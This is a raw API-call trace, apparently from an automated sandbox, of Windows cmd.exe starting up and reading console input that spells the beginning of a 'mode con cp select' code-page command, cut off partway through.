GetProcessHeap () returned 0x220000 [0032.272] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23cd20 | out: hHeap=0x220000) returned 1 [0032.272] GetConsoleOutputCP () returned 0x1b5 [0032.273] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8ebfe0 | out: lpCPInfo=0x4a8ebfe0) returned 1 [0032.273] GetUserDefaultLCID () returned 0x409 [0032.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a8e7b50, cchData=8 | out: lpLCData=":") returned 2 [0032.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fa30, cchData=128 | out: lpLCData="0") returned 2 [0032.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fa30, cchData=128 | out: lpLCData="0") returned 2 [0032.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fa30, cchData=128 | out: lpLCData="1") returned 2 [0032.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a8fa740, cchData=8 | out: lpLCData="/") returned 2 [0032.273] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a8fa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a8fa460, cchData=32 | out: lpLCData="Tue") returned 4 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a8fa420, cchData=32 | out: lpLCData="Wed") returned 4 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a8fa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a8fa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a8fa360, cchData=32 | out: lpLCData="Sat") returned 4 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a8fa700, cchData=32 | out: lpLCData="Sun") returned 4 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a8e7b40, cchData=8 | out: lpLCData=".") returned 2 [0032.274] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a8fa4e0, cchData=8 | out: lpLCData=",") returned 2 [0032.274] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0032.275] GetProcessHeap () returned 0x220000 [0032.275] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x20c) returned 0x2395c0 [0032.275] GetConsoleTitleW (in: lpConsoleTitle=0x2395c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.275] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.275] GetFileType (hFile=0xf4) returned 0x3 [0032.276] BrandingFormatString () returned 0x2397e0 [0032.287] GetVersion () returned 0x1db10106 [0032.287] _vsnwprintf (in: _Buffer=0x19fba0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x19fb38 | out: _Buffer="6.1.7601") returned 8 [0032.287] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.287] GetFileType (hFile=0xf4) returned 0x3 [0032.287] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a8f6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0032.287] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a8f6340, nSize=0x2000, Arguments=0x19fb40 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0032.287] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.287] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0032.288] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x19fac8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19fac8*=0x24, lpOverlapped=0x0) returned 1 [0032.288] _vsnwprintf (in: _Buffer=0x4a8f6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19fb68 | out: _Buffer="\r\n") returned 2 [0032.288] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.288] GetFileType (hFile=0xf4) returned 0x3 [0032.288] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.288] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19fb38, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19fb38*=0x2, lpOverlapped=0x0) returned 1 [0032.288] _vsnwprintf (in: _Buffer=0x4a8f6340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x19fb68 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0032.288] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.288] GetFileType (hFile=0xf4) returned 0x3 [0032.288] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0032.288] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x19fb38, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19fb38*=0x3f, lpOverlapped=0x0) returned 1 [0032.288] _vsnwprintf (in: _Buffer=0x4a8f6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19fb68 | out: _Buffer="\r\n") returned 2 [0032.288] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.288] GetFileType (hFile=0xf4) returned 0x3 [0032.288] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.288] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.288] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19fb38, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19fb38*=0x2, lpOverlapped=0x0) returned 1 [0032.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0032.288] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0032.288] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0032.288] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0032.289] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.289] GetFileType (hFile=0xe8) returned 0x3 [0032.289] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0032.289] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x19f990 | out: TokenHandle=0x19f990*=0x0) returned 0xc000007c [0032.289] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x19f990 | out: TokenHandle=0x19f990*=0x50) returned 0x0 [0032.289] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x19f9a0, TokenInformationLength=0x4, ReturnLength=0x19f9a8 | out: TokenInformation=0x19f9a0, ReturnLength=0x19f9a8) returned 0x0 [0032.289] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x19f9a8, TokenInformationLength=0x4, ReturnLength=0x19f9a0 | out: TokenInformation=0x19f9a8, ReturnLength=0x19f9a0) returned 0x0 [0032.289] NtClose (Handle=0x50) returned 0x0 [0032.289] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x19f970, nSize=0x0, Arguments=0x19f978 | out: lpBuffer="\x97e0\x23") returned 0xf [0032.289] GetProcessHeap () returned 0x220000 [0032.289] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x221ab0 [0032.289] GetConsoleTitleW (in: lpConsoleTitle=0x19f9c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.289] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0032.289] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0032.291] GetProcessHeap () returned 0x220000 [0032.291] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x221ab0 | out: hHeap=0x220000) returned 1 [0032.291] LocalFree (hMem=0x2397e0) returned 0x0 [0032.291] GetProcessHeap () returned 0x220000 [0032.291] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23aa10 | out: hHeap=0x220000) returned 1 [0032.291] _vsnwprintf (in: _Buffer=0x4a8f6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f6a8 | out: _Buffer="\r\n") returned 2 [0032.291] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.291] GetFileType (hFile=0xf4) returned 0x3 [0032.291] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.292] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19f678, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19f678*=0x2, lpOverlapped=0x0) returned 1 [0032.292] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0032.292] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.292] _vsnwprintf (in: _Buffer=0x4a8deb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f6b8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0032.292] _vsnwprintf (in: _Buffer=0x4a8debaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x19f6b8 | out: _Buffer=">") returned 1 [0032.292] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.292] GetFileType (hFile=0xf4) returned 0x3 [0032.292] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0032.292] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x19f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19f6a8*=0x26, lpOverlapped=0x0) returned 1 [0032.292] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.292] GetFileType (hFile=0xe8) returned 0x3 [0032.292] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.292] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.292] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.292] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0032.294] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.294] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.294] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.294] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0032.294] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.294] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.294] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.294] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0032.294] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.294] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.294] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.295] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.295] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.295] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.295] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.295] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.295] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0032.295] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.295] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0032.295] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.295] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.295] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.295] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.295] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.295] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.295] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0032.296] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.296] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.296] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.296] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.296] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.296] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0032.296] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.296] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.296] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.296] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.296] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.296] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0032.296] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.296] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.296] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.296] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.296] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.296] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.296] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.296] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.296] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.296] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0032.297] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.297] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.297] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.297] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0032.297] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.297] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.297] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.297] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0032.297] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.297] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.297] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.297] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0032.297] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.297] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, 